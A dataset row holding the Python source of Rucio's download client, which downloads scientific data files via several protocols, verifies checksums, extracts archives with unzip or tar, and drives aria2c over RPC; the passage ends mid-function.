source
stringlengths
3
86
python
stringlengths
75
1.04M
downloadclient.py
# Copyright 2018 CERN for the benefit of the ATLAS collaboration. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Authors: # - Tomas Javurek <tomasjavurek09@gmail.com>, 2018 # - Vincent Garonne <vgaronne@gmail.com>, 2018 # - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018 # - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019 # - Tobias Wegner <tobias.wegner@cern.ch>, 2018-2019 # - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019 # - Martin Barisits <martin.barisits@cern.ch>, 2019 # - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019 # - Thomas Beermann <thomas.beermann@cern.ch>, 2021 # - Radu Carpa <radu.carpa@cern.ch>, 2021 # # PY3K COMPATIBLE from __future__ import division import copy import logging import os import random import shutil import signal import time try: from Queue import Queue, Empty, deque except ImportError: from queue import Queue, Empty, deque from threading import Thread from rucio.client.client import Client from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException) from rucio.common.didtype import DIDType from rucio.common.pcache import Pcache from rucio.common.utils import adler32, detect_client_location, generate_uuid, parse_replicas_from_string, \ send_trace, sizefmt, execute, parse_replicas_from_file from rucio.common.utils import GLOBALLY_SUPPORTED_CHECKSUMS, CHECKSUM_ALGO_DICT, PREFERRED_CHECKSUM from rucio.rse import rsemanager as rsemgr from rucio import version class BaseExtractionTool: def __init__(self, program_name, useability_check_args, extract_args, logger=logging.log): """ Initialises a extraction tool object :param program_name: the name of the archive extraction program, e.g., unzip :param useability_check_args: the arguments of the extraction program to test if its installed, e.g., --version :param extract_args: the arguments that will be passed to the program for extraction :param logger: optional decorated logging.log object that can be passed from the calling daemon or client. """ self.program_name = program_name self.useability_check_args = useability_check_args self.extract_args = extract_args self.logger = logger self.is_useable_result = None def is_useable(self): """ Checks if the extraction tool is installed and usable :returns: True if it is usable otherwise False """ if self.is_useable_result is not None: return self.is_useable_result self.is_usable_result = False cmd = '%s %s' % (self.program_name, self.useability_check_args) try: exitcode, out, err = execute(cmd) exitcode = int(exitcode) self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode)) self.is_usable_result = (exitcode == 0) except Exception as error: self.logger(logging.DEBUG, 'Failed to execute: "%s"' % exitcode) self.logger(logging.DEBUG, error) return self.is_usable_result def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path): """ Calls the extraction program to extract a file from an archive :param archive_file_path: path to the archive :param file_to_extract: file name to extract from the archive :param dest_dir_path: destination directory where the extracted file will be stored :returns: True on success otherwise False """ if not self.is_useable(): return False args_map = {'archive_file_path': archive_file_path, 'file_to_extract': file_to_extract, 'dest_dir_path': dest_dir_path} extract_args = self.extract_args % args_map cmd = '%s %s' % (self.program_name, extract_args) try: exitcode, out, err = execute(cmd) exitcode = int(exitcode) self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode)) return (exitcode == 0) except Exception as error: self.logger(logging.DEBUG, 'Failed to execute: "%s"' % exitcode) self.logger(logging.DEBUG, error) return False class DownloadClient: def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False): """ Initialises the basic settings for an DownloadClient object :param client: Optional: rucio.client.client.Client object. If None, a new object will be created. :param external_traces: Optional: reference to a list where traces can be added :param logger: Optional: logging.Logger object. If None, default logger will be used. """ self.check_pcache = check_pcache if not logger: self.logger = logging.log else: self.logger = logger.log self.tracing = tracing if not self.tracing: logger(logging.DEBUG, 'Tracing is turned off.') self.is_human_readable = True self.client = client if client else Client() # if token should be used, use only JWT tokens self.auth_token = self.client.auth_token if len(self.client.auth_token.split(".")) == 3 else None self.client_location = detect_client_location() self.is_tape_excluded = True self.is_admin = False if check_admin: account_attributes = list(self.client.list_account_attributes(self.client.account)) for attr in account_attributes[0]: if attr['key'] == 'admin': self.is_admin = attr['value'] is True break if self.is_admin: self.is_tape_excluded = False logger(logging.DEBUG, 'Admin mode enabled') self.trace_tpl = {} self.trace_tpl['hostname'] = self.client_location['fqdn'] self.trace_tpl['localSite'] = self.client_location['site'] self.trace_tpl['account'] = self.client.account if self.client.vo != 'def': self.trace_tpl['vo'] = self.client.vo self.trace_tpl['eventType'] = 'download' self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0] self.use_cea_threshold = 10 self.extraction_tools = [] # unzip <archive_file_path> <did_name> -d <dest_dir_path> extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s' self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger=self.logger)) # tar -C <dest_dir_path> -xf <archive_file_path> <did_name> extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s' self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger=self.logger)) def download_pfns(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None): """ Download items with a given PFN. This function can only download files, no datasets. :param items: List of dictionaries. Each dictionary describing a file to download. Keys: pfn - PFN string of this file did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.') no_subdir - Optional: If true, files are written directly into base_dir. (Default: False) adler32 - Optional: The adler32 checmsum to compare the downloaded files adler32 checksum with md5 - Optional: The md5 checksum to compare the downloaded files md5 checksum with transfer_timeout - Optional: Timeout time for the download protocols. (Default: None) :param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high. :param trace_custom_fields: Custom key value pairs to send with the traces :param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something unexpected went wrong during the download """ logger = self.logger trace_custom_fields['uuid'] = generate_uuid() logger(logging.INFO, 'Processing %d item(s) for input' % len(items)) input_items = [] for item in items: did_str = item.get('did') pfn = item.get('pfn') rse = item.get('rse') if not did_str or not pfn or not rse: logger(logging.DEBUG, item) raise InputValidationError('The keys did, pfn, and rse are mandatory') logger(logging.DEBUG, 'Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse)) if '*' in did_str: logger(logging.DEBUG, did_str) raise InputValidationError('Cannot use PFN download with wildcard in DID') did_scope, did_name = self._split_did_str(did_str) dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'), did_scope, item.get('no_subdir')) item['scope'] = did_scope item['name'] = did_name item['sources'] = [{'pfn': pfn, 'rse': rse}] dest_file_path = os.path.join(dest_dir_path, did_name) item['dest_file_paths'] = [dest_file_path] item['temp_file_path'] = '%s.part' % dest_file_path options = item.setdefault('merged_options', {}) options['ignore_checksum'] = 'adler32' not in item and 'md5' not in item options.setdefault('transfer_timeout', item.pop('transfer_timeout', None)) input_items.append(item) num_files_in = len(input_items) output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out) num_files_out = len(output_items) if num_files_in != num_files_out: raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out)) return self._check_output(output_items) def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None): """ Download items with given DIDs. This function can also download datasets and wildcarded DIDs. :param items: List of dictionaries. Each dictionary describing an item to download. Keys: did - DID string of this file (e.g. 'scope:file.name') filters - Filter to select DIDs for download. Optional if DID is given rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False) resolve_archives - Deprecated: Use no_resolve_archives instead force_scheme - Optional: force a specific scheme to download this item. (Default: None) base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.') no_subdir - Optional: If true, files are written directly into base_dir. (Default: False) nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False) transfer_timeout - Optional: Timeout time for the download protocols. (Default: None) :param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high. :param trace_custom_fields: Custom key value pairs to send with the traces. :param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something unexpected went wrong during the download """ logger = self.logger trace_custom_fields['uuid'] = generate_uuid() logger(logging.INFO, 'Processing %d item(s) for input' % len(items)) download_info = self._resolve_and_merge_input_items(copy.deepcopy(items)) did_to_options = download_info['did_to_options'] merged_items = download_info['merged_items'] self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items))) logger(logging.INFO, 'Getting sources of DIDs') # if one item wants to resolve archives we enable it for all items resolve_archives = not all(item.get('no_resolve_archives') for item in merged_items) merged_items_with_sources = self._get_sources(merged_items, resolve_archives=resolve_archives) input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=resolve_archives) num_files_in = len(input_items) output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out) num_files_out = len(output_items) if num_files_in != num_files_out: raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out)) return self._check_output(output_items) def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None): """ Download items using a given metalink file. :param item: dictionary describing an item to download. Keys: base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.') no_subdir - Optional: If true, files are written directly into base_dir. (Default: False) ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False) transfer_timeout - Optional: Timeout time for the download protocols. (Default: None) :param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high. :param trace_custom_fields: Custom key value pairs to send with the traces. :param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something unexpected went wrong during the download """ logger = self.logger logger(logging.INFO, 'Getting sources from metalink file') metalinks = parse_replicas_from_file(metalink_file_path) trace_custom_fields['uuid'] = generate_uuid() did_to_options = {} item.setdefault('destinations', set()).add((item['base_dir'], item['no_subdir'])) for metalink in metalinks: did_to_options[metalink['did']] = item metalinks = [metalinks] input_items = self._prepare_items_for_download(did_to_options, metalinks) num_files_in = len(input_items) output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out) num_files_out = len(output_items) if num_files_in != num_files_out: raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out)) return self._check_output(output_items) def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}, traces_copy_out=None): """ Starts an appropriate number of threads to download items from the input list. (This function is meant to be used as class internal only) :param input_items: list containing the input items to download :param num_threads: suggestion of how many threads should be started :param trace_custom_fields: Custom key value pairs to send with the traces :param traces_copy_out: reference to an external list, where the traces should be uploaded :returns: list with output items as dictionaries """ logger = self.logger num_files = len(input_items) nlimit = 5 num_threads = max(1, num_threads) num_threads = min(num_files, num_threads, nlimit) input_queue = Queue() output_queue = Queue() input_queue.queue = deque(input_items) if num_threads < 2: logger(logging.INFO, 'Using main thread to download %d file(s)' % num_files) self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '') return list(output_queue.queue) logger(logging.INFO, 'Using %d threads to download %d files' % (num_threads, num_files)) threads = [] for thread_num in range(0, num_threads): log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads) kwargs = {'input_queue': input_queue, 'output_queue': output_queue, 'trace_custom_fields': trace_custom_fields, 'traces_copy_out': traces_copy_out, 'log_prefix': log_prefix} try: thread = Thread(target=self._download_worker, kwargs=kwargs) thread.start() threads.append(thread) except Exception as error: logger(logging.WARNING, 'Failed to start thread %d' % thread_num) logger(logging.DEBUG, error) try: logger(logging.DEBUG, 'Waiting for threads to finish') for thread in threads: thread.join() except KeyboardInterrupt: logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully') for thread in threads: thread.kill_received = True return list(output_queue.queue) def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix): """ This function runs as long as there are items in the input queue, downloads them and stores the output in the output queue. (This function is meant to be used as class internal only) :param input_queue: queue containing the input items to download :param output_queue: queue where the output items will be stored :param trace_custom_fields: Custom key value pairs to send with the traces :param traces_copy_out: reference to an external list, where the traces should be uploaded :param log_prefix: string that will be put at the beginning of every log message """ logger = self.logger logger(logging.DEBUG, '%sStart processing queued downloads' % log_prefix) while True: try: item = input_queue.get_nowait() except Empty: break try: trace = copy.deepcopy(self.trace_tpl) trace.update(trace_custom_fields) download_result = self._download_item(item, trace, traces_copy_out, log_prefix) output_queue.put(download_result) except KeyboardInterrupt: logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully') os.kill(os.getpgid(), signal.SIGINT) break except Exception as error: logger(logging.ERROR, '%sFailed to download item' % log_prefix) logger(logging.DEBUG, error) def _download_item(self, item, trace, traces_copy_out, log_prefix=''): """ Downloads the given item and sends traces for success/failure. (This function is meant to be used as class internal only) :param item: dictionary that describes the item to download :param trace: dictionary representing a pattern of trace that will be send :param traces_copy_out: reference to an external list, where the traces should be uploaded :param log_prefix: string that will be put at the beginning of every log message :returns: dictionary with all attributes from the input item and a clientState attribute """ logger = self.logger pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None did_scope = item['scope'] did_name = item['name'] did_str = '%s:%s' % (did_scope, did_name) logger(logging.INFO, '%sPreparing download of %s' % (log_prefix, did_str)) trace['scope'] = did_scope trace['filename'] = did_name trace.setdefault('datasetScope', item.get('dataset_scope', '')) trace.setdefault('dataset', item.get('dataset_name', '')) trace.setdefault('filesize', item.get('bytes')) trace.setdefault('clientState', 'PROCESSING') trace.setdefault('stateReason', 'UNKNOWN') dest_file_paths = item['dest_file_paths'] # appending trace to list reference, if the reference exists if traces_copy_out is not None: traces_copy_out.append(trace) # if file already exists make sure it exists at all destination paths, set state, send trace, and return for dest_file_path in dest_file_paths: if os.path.isfile(dest_file_path): if not item.get('merged_options', {}).get('ignore_checksum', False): verified, _, _ = _verify_checksum(item, dest_file_path) if not verified: logger(logging.INFO, '%sFile with same name exists locally, but checksum mismatches: %s' % (log_prefix, did_str)) continue logger(logging.INFO, '%sFile exists already locally: %s' % (log_prefix, did_str)) for missing_file_path in dest_file_paths: if not os.path.isfile(missing_file_path): logger(logging.DEBUG, "copying '%s' to '%s'" % (dest_file_path, missing_file_path)) shutil.copy2(dest_file_path, missing_file_path) item['clientState'] = 'ALREADY_DONE' trace['transferStart'] = time.time() trace['transferEnd'] = time.time() trace['clientState'] = 'ALREADY_DONE' send_trace(trace, self.client.host, self.client.user_agent) return item # check if file has replicas sources = item.get('sources') if not sources or not len(sources): logger(logging.WARNING, '%sNo available source found for file: %s' % (log_prefix, did_str)) item['clientState'] = 'FILE_NOT_FOUND' trace['clientState'] = 'FILE_NOT_FOUND' trace['stateReason'] = 'No available sources' self._send_trace(trace) return item # checking Pcache storage_prefix = None if pcache: # to check only first replica is enough pfn = sources[0]['pfn'] rse_name = sources[0]['rse'] # protocols are needed to extract deterministic part of the pfn scheme = None prots = self.client.get_protocols(rse_name) for prot in prots: if prot['scheme'] in pfn and prot['prefix'] in pfn: scheme = prot['scheme'] storage_prefix = prot['prefix'] # proceed with the actual check logger(logging.INFO, 'Checking whether %s is in pcache' % dest_file_path) pcache_state = None hardlink_state = None try: pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path) except Exception as e: logger(logging.WARNING, 'Pcache failure: %s' % str(e)) # if file found in pcache, send trace and return if pcache_state == 0 and hardlink_state == 1: logger(logging.INFO, 'File found in pcache.') item['clientState'] = 'FOUND_IN_PCACHE' trace['transferStart'] = time.time() trace['transferEnd'] = time.time() trace['clientState'] = 'FOUND_IN_PCACHE' self._send_trace(trace) return item else: logger(logging.INFO, 'File not found in pcache.') # try different PFNs until one succeeded temp_file_path = item['temp_file_path'] success = False i = 0 while not success and i < len(sources): source = sources[i] i += 1 pfn = source['pfn'] rse_name = source['rse'] scheme = pfn.split(':')[0] try: rse = rsemgr.get_rse_info(rse_name, vo=self.client.vo) except RucioException as error: logger(logging.WARNING, '%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error)) trace['stateReason'] = str(error) continue trace['remoteSite'] = rse_name trace['clientState'] = 'DOWNLOAD_ATTEMPT' trace['protocol'] = scheme logger(logging.INFO, '%sTrying to download with %s from %s: %s ' % (log_prefix, scheme, rse_name, did_str)) try: protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme, auth_token=self.auth_token, logger=logger) protocol.connect() except Exception as error: logger(logging.WARNING, '%sFailed to create protocol for PFN: %s' % (log_prefix, pfn)) logger(logging.DEBUG, 'scheme: %s, exception: %s' % (scheme, error)) trace['stateReason'] = str(error) continue attempt = 0 retries = 2 # do some retries with the same PFN if the download fails while not success and attempt < retries: attempt += 1 item['attemptnr'] = attempt if os.path.isfile(temp_file_path): logger(logging.DEBUG, '%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path)) os.unlink(temp_file_path) start_time = time.time() try: protocol.get(pfn, temp_file_path, transfer_timeout=item.get('merged_options', {}).get('transfer_timeout')) success = True except Exception as error: logger(logging.DEBUG, error) trace['clientState'] = str(type(error).__name__) trace['stateReason'] = str(error) end_time = time.time() if success and not item.get('merged_options', {}).get('ignore_checksum', False): verified, rucio_checksum, local_checksum = _verify_checksum(item, temp_file_path) if not verified: success = False os.unlink(temp_file_path) logger(logging.WARNING, '%sChecksum validation failed for file: %s' % (log_prefix, did_str)) logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)) trace['clientState'] = 'FAIL_VALIDATE' trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum) if not success: logger(logging.WARNING, '%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries)) self._send_trace(trace) protocol.close() if not success: logger(logging.ERROR, '%sFailed to download file %s' % (log_prefix, did_str)) item['clientState'] = 'FAILED' return item dest_file_path_iter = iter(dest_file_paths) first_dest_file_path = next(dest_file_path_iter) logger(logging.DEBUG, "renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path)) os.rename(temp_file_path, first_dest_file_path) # if the file was downloaded with success, it can be linked to pcache if pcache: logger(logging.INFO, 'File %s is going to be registerred into pcache.' % dest_file_path) try: pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path) logger(logging.INFO, 'File %s is now registerred into pcache.' % first_dest_file_path) except Exception as e: logger(logging.WARNING, 'Failed to load file to pcache: %s' % str(e)) for cur_dest_file_path in dest_file_path_iter: logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path)) shutil.copy2(first_dest_file_path, cur_dest_file_path) trace['transferStart'] = start_time trace['transferEnd'] = end_time trace['clientState'] = 'DONE' trace['stateReason'] = 'OK' item['clientState'] = 'DONE' self._send_trace(trace) duration = round(end_time - start_time, 2) size = item.get('bytes') size_str = sizefmt(size, self.is_human_readable) if size and duration: rate = round((size / duration) * 1e-6, 2) logger(logging.INFO, '%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate)) else: logger(logging.INFO, '%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration)) file_items_in_archive = item.get('archive_items', []) if len(file_items_in_archive) > 0: logger(logging.INFO, '%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name)) archive_file_path = first_dest_file_path for file_item in file_items_in_archive: extraction_ok = False extract_file_name = file_item['name'] dest_file_path_iter = iter(file_item['dest_file_paths']) first_dest_file_path = next(dest_file_path_iter) dest_dir = os.path.dirname(first_dest_file_path) logger(logging.DEBUG, '%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir)) for extraction_tool in self.extraction_tools: if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir): extraction_ok = True break if not extraction_ok: logger(logging.ERROR, 'Extraction of file %s from archive %s failed.' % (extract_file_name, did_name)) continue first_dest_file_path = os.path.join(dest_dir, extract_file_name) for cur_dest_file_path in dest_file_path_iter: logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path)) shutil.copy2(first_dest_file_path, cur_dest_file_path) if not item.get('shall_keep_archive'): logger(logging.DEBUG, '%sDeleting archive %s' % (log_prefix, did_name)) os.remove(archive_file_path) return item def download_aria2c(self, items, trace_custom_fields={}, filters={}): """ Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs. It only can download files that are available via https/davs. Aria2c needs to be installed and X509_USER_PROXY needs to be set! :param items: List of dictionaries. Each dictionary describing an item to download. Keys: did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.') no_subdir - Optional: If true, files are written directly into base_dir. (Default: False) nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False) :param trace_custom_fields: Custom key value pairs to send with the traces :param filters: dictionary containing filter options :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState :raises InputValidationError: if one of the input items is in the wrong format :raises NoFilesDownloaded: if no files could be downloaded :raises NotAllFilesDownloaded: if not all files could be downloaded :raises RucioException: if something went wrong during the download (e.g. aria2c could not be started) """ logger = self.logger trace_custom_fields['uuid'] = generate_uuid() rpc_secret = '%x' % (random.getrandbits(64)) rpc_auth = 'token:%s' % rpc_secret rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret) for item in items: item['force_scheme'] = ['https', 'davs'] logger(logging.INFO, 'Processing %d item(s) for input' % len(items)) download_info = self._resolve_and_merge_input_items(copy.deepcopy(items)) did_to_options = download_info['did_to_options'] merged_items = download_info['merged_items'] self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_merged_items=%d' % (len(items), len(did_to_options), len(merged_items))) logger(logging.INFO, 'Getting sources of DIDs') merged_items_with_sources = self._get_sources(merged_items) input_items = self._prepare_items_for_download(did_to_options, merged_items_with_sources, resolve_archives=False) try: output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields) except Exception as error: self.logger(logging.ERROR, 'Unknown exception during aria2c download') self.logger(logging.DEBUG, error) finally: try: aria_rpc.aria2.forceShutdown(rpc_auth) finally: rpcproc.terminate() return self._check_output(output_items) def _start_aria2c_rpc(self, rpc_secret): """ Starts aria2c in RPC mode as a subprocess. Also creates the RPC proxy instance. (This function is meant to be used as class internal only) :param rpc_secret: the secret for the RPC proxy :returns: a tupel with the process and the rpc proxy objects :raises RucioException: if the process or the proxy could not be created """ logger = self.logger try: from xmlrpclib import ServerProxy as RPCServerProxy # py2 except ImportError: from xmlrpc.client import ServerProxy as RPCServerProxy cmd = 'aria2c '\ '--enable-rpc '\ '--certificate=$X509_USER_PROXY '\ '--private-key=$X509_USER_PROXY '\ '--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\ '--quiet=true '\ '--allow-overwrite=true '\ '--auto-file-renaming=false '\ '--stop-with-process=%d '\ '--rpc-secret=%s '\ '--rpc-listen-all=false '\ '--rpc-max-request-size=100M '\ '--connect-timeout=5 '\ '--rpc-listen-port=%d' logger(logging.INFO, 'Starting aria2c rpc server...') # trying up to 3 random ports for attempt in range(3): port = random.randint(1024, 65534) logger(logging.DEBUG, 'Trying to start rpc server on port: %d' % port) try: to_exec = cmd % (os.getpid(), rpc_secret, port) logger(logging.DEBUG, to_exec) rpcproc = execute(to_exec, False) except Exception as error: raise RucioException('Failed to execute aria2c!', error) # if port is in use aria should fail to start so give it some time time.sleep(2) # did it fail? if rpcproc.poll() is not None: (out, err) = rpcproc.communicate() logger(logging.DEBUG, 'Failed to start aria2c with port: %d' % port) logger(logging.DEBUG, 'aria2c output: %s' % out) else: break if rpcproc.poll() is not None: raise RucioException('Failed to start aria2c rpc server!') try: aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port) except Exception as error: rpcproc.kill() raise RucioException('Failed to initialise rpc proxy!', error) return (rpcproc, aria_rpc) def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}): """ Uses aria2c to download the given items. Aria2c needs to be started as RPC background process first and a RPC proxy is needed. (This function is meant to be used as class internal only) :param items: list of dictionaries containing one dict for each file to download :param aria_rcp: RPCProxy to the aria2c process :param rpc_auth: the rpc authentication token :param trace_custom_fields: Custom key value pairs to send with the traces :returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState """ logger = self.logger gid_to_item = {} # maps an aria2c download id (gid) to the download item pfn_to_rse = {} items_to_queue = [item for item in items] # items get removed from gid_to_item when they are complete or failed while len(gid_to_item) or len(items_to_queue): num_queued = 0 # queue up to 100 files and then check arias status while (num_queued < 100) and len(items_to_queue): item = items_to_queue.pop() file_scope = item['scope'] file_name = item['name'] file_did_str = '%s:%s' % (file_scope, file_name) trace = {'scope': file_scope, 'filename': file_name, 'datasetScope': item.get('dataset_scope', ''), 'dataset': item.get('dataset_name', ''), 'protocol': 'https', 'remoteSite': '', 'filesize': item.get('bytes', None), 'transferStart': time.time(), 'transferEnd': time.time()} trace.update(self.trace_tpl) trace.update(trace_custom_fields) # get pfns from all replicas pfns = [] for src in item['sources']: pfn = src['pfn'] if pfn[0:4].lower() == 'davs': pfn = pfn.replace('davs', 'https', 1) pfns.append(pfn) pfn_to_rse[pfn] = src['rse'] # does file exist and are sources available? # workaround: only consider first dest file path for aria2c download dest_file_path = next(iter(item['dest_file_paths'])) if os.path.isfile(dest_file_path): logger(logging.INFO, 'File exists already locally: %s' % file_did_str) item['clientState'] = 'ALREADY_DONE' trace['clientState'] = 'ALREADY_DONE' self._send_trace(trace) elif len(pfns) == 0: logger(logging.WARNING, 'No available source found for file: %s' % file_did_str) item['clientState'] = 'FILE_NOT_FOUND' trace['clientState'] = 'FILE_NOT_FOUND' self._send_trace(trace) else: item['trace'] = trace options = {'dir': os.path.dirname(dest_file_path), 'out': os.path.basename(item['temp_file_path'])} gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options) gid_to_item[gid] = item num_queued += 1 logger(logging.DEBUG, 'Queued file: %s' % file_did_str) # get some statistics aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth) num_active = int(aria_stat['numActive']) num_waiting = int(aria_stat['numWaiting']) num_stopped = int(aria_stat['numStoppedTotal']) # save start time if one of the active downloads has started active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength']) for dlinfo in active: gid = dlinfo['gid'] if int(dlinfo['completedLength']) > 0: gid_to_item[gid].setdefault('transferStart', time.time()) stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files']) for dlinfo in stopped: gid = dlinfo['gid'] item = gid_to_item[gid] file_scope = item['scope'] file_name = item['name'] file_did_str = '%s:%s' % (file_scope, file_name) temp_file_path = item['temp_file_path'] # workaround: only consider first dest file path for aria2c download dest_file_path = next(iter(item['dest_file_paths'])) # ensure we didnt miss the active state (e.g. a very fast download) start_time = item.setdefault('transferStart', time.time()) end_time = item.setdefault('transferEnd', time.time()) # get used pfn for traces trace = item['trace'] for uri in dlinfo['files'][0]['uris']: if uri['status'].lower() == 'used': trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '') trace['transferStart'] = start_time trace['transferEnd'] = end_time # ensure file exists status = dlinfo.get('status', '').lower() if status == 'complete' and os.path.isfile(temp_file_path): # checksum check skip_check = item.get('ignore_checksum', False) rucio_checksum = 0 if skip_check else item.get('adler32') local_checksum = 0 if skip_check else adler32(temp_file_path) if rucio_checksum == local_checksum: item['clientState'] = 'DONE' trace['clientState'] = 'DONE' # remove .part ending os.rename(temp_file_path, dest_file_path) # calculate duration duration = round(end_time - start_time, 2) duration = max(duration, 0.01) # protect against 0 division size = item.get('bytes', 0) rate = round((size / duration) * 1e-6, 2) size_str = sizefmt(size, self.is_human_readable) logger(logging.INFO, 'File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str, size_str, duration, rate)) else: os.unlink(temp_file_path) logger(logging.WARNING, 'Checksum validation failed for file: %s' % file_did_str) logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)) item['clientState'] = 'FAIL_VALIDATE' trace['clientState'] = 'FAIL_VALIDATE' else: logger(logging.ERROR, 'Failed to download file: %s' % file_did_str) logger(logging.DEBUG, 'Aria2c status: %s' % status) item['clientState'] = 'FAILED' trace['clientState'] = 'DOWNLOAD_ATTEMPT' self._send_trace(trace) del item['trace'] aria_rpc.aria2.removeDownloadResult(rpc_auth, 